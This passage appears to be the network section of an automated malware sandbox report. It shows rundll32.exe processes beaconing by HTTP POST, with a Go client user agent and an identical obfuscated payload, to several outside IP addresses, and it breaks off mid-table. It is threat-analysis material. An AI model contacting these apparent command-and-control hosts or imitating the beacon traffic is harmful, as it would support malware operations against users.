Jul 15, 2024 12:46:17.879429102 CEST	80	54570	91.142.74.28	192.168.2.7
Jul 15, 2024 12:46:19.594507933 CEST	80	54570	91.142.74.28	192.168.2.7
Jul 15, 2024 12:46:19.594631910 CEST	54570	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:46:19.594769001 CEST	54570	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:46:19.595865965 CEST	54571	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:46:19.599638939 CEST	80	54570	91.142.74.28	192.168.2.7
Jul 15, 2024 12:46:19.600683928 CEST	80	54571	77.238.224.56	192.168.2.7
Jul 15, 2024 12:46:19.600775957 CEST	54571	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:46:19.601041079 CEST	54571	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:46:19.605849028 CEST	80	54571	77.238.224.56	192.168.2.7
Jul 15, 2024 12:46:21.226910114 CEST	80	54571	77.238.224.56	192.168.2.7
Jul 15, 2024 12:46:21.230132103 CEST	54571	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:46:21.230132103 CEST	54571	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:46:21.231077909 CEST	54572	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:46:21.235039949 CEST	80	54571	77.238.224.56	192.168.2.7
Jul 15, 2024 12:46:21.235919952 CEST	80	54572	77.238.229.63	192.168.2.7
Jul 15, 2024 12:46:21.236007929 CEST	54572	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:46:21.236352921 CEST	54572	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:46:21.241113901 CEST	80	54572	77.238.229.63	192.168.2.7
Jul 15, 2024 12:46:22.874063969 CEST	80	54572	77.238.229.63	192.168.2.7
Jul 15, 2024 12:46:22.877444029 CEST	54572	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:46:22.877583027 CEST	54572	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:46:22.878480911 CEST	54573	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:46:22.883342981 CEST	80	54572	77.238.229.63	192.168.2.7
Jul 15, 2024 12:46:22.883359909 CEST	80	54573	77.238.250.123	192.168.2.7
Jul 15, 2024 12:46:22.883446932 CEST	54573	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:46:22.883696079 CEST	54573	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:46:22.889971972 CEST	80	54573	77.238.250.123	192.168.2.7
Jul 15, 2024 12:46:23.486996889 CEST	80	54573	77.238.250.123	192.168.2.7
Jul 15, 2024 12:46:23.487392902 CEST	54573	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:46:23.493113995 CEST	80	54573	77.238.250.123	192.168.2.7
Jul 15, 2024 12:46:23.493185997 CEST	54573	80	192.168.2.7	77.238.250.123

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 15, 2024 12:42:59.204530954 CEST	53	55038	162.159.36.2	192.168.2.7
Jul 15, 2024 12:42:59.699203014 CEST	53	49719	1.1.1.1	192.168.2.7

HTTP Request Dependency Graph

195.2.70.38

91.142.74.28

77.238.224.56

77.238.229.63

77.238.250.123

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49707	195.2.70.38	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:42:22.409168005 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: cWH6SWQ2 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49708	195.2.70.38	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:42:22.411345959 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: A6pKKeiW Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49709	91.142.74.28	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:42:24.145646095 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: NnIjIoiA Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49710	91.142.74.28	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:42:24.147154093 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: j7CGqB05 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49711	77.238.224.56	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:42:25.912389994 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 72ziAeHH Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49712	77.238.224.56	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:42:25.916162968 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: q5rejW75 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49713	77.238.229.63	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:42:27.529103994 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: sTdvKAjV Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49714	77.238.229.63	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:42:27.541142941 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 15rKS65l Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49715	77.238.250.123	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:42:29.375309944 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: WK3Ru40h Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:42:29.869740963 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:42:29 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49716	77.238.250.123	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:42:29.410412073 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 99ZQAnIt Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:42:29.890698910 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:42:29 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49717	195.2.70.38	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:42:31.439702034 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: F61EC4AG Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49722	91.142.74.28	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:42:33.204940081 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: rFCoEZ2I Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49724	77.238.224.56	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:42:34.942739964 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 9Z9QIGax Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49725	77.238.229.63	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:42:36.612364054 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: NCn1PF1n Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49726	77.238.250.123	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:42:38.211824894 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 58hEWjaO Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:42:38.815567017 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:42:38 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	54484	195.2.70.38	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:00.044554949 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 2G1PbDYA Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	54485	195.2.70.38	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:00.044605970 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: Qa0b7yX0 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	54486	91.142.74.28	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:02.594851017 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: Ri6vXsfW Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	54487	91.142.74.28	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
